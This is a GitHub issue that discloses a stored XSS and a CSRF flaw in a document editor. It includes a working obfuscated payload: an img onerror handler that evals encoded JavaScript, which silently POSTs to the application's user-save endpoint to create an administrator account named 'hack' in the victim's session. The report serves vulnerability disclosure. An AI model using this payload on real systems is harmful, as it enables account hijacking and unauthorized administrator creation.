Skip to content

Vulnerability: Stored XSS and CSRF #68

Open
@0x2E

Description

@0x2E

Hello, I found two vulnerabilities: a stored XSS and a CSRF.
Attacker can exploit the vulnerability to execute malicious javascript on a document page and hijack the identity of other users (normal users or administrators).

XSS

The document editor does not filter or block the execution of Javascript, resulting in stored XSS. Any user browsing the document containing XSS malicious code will trigger the vulnerability.

xss

CSRF

Using the XSS vulnerability from the previous step, attacker can hijack the identity of other users. I recorded a GIF to demonstrate a normal user hijacking the super administrator's identity to create a new administrator account.

Payload

<img src=# onerror='eval(decodeURI("var%20a%20=%20window.XMLHttpRequest%20?%20new%20XMLHttpRequest()%20:%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22);a.open(%22POST%22,%22/system/user/save%22,false);a.setRequestHeader(%22Content-type%22,%22application/x-www-form-urlencoded%22);a.send(%22username=hack&given_name=hack&password=hack&email=1%25401.cn&mobile=18888888888&role_id=1&phone=&department=&position=&location=&im=%22);"))'>

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions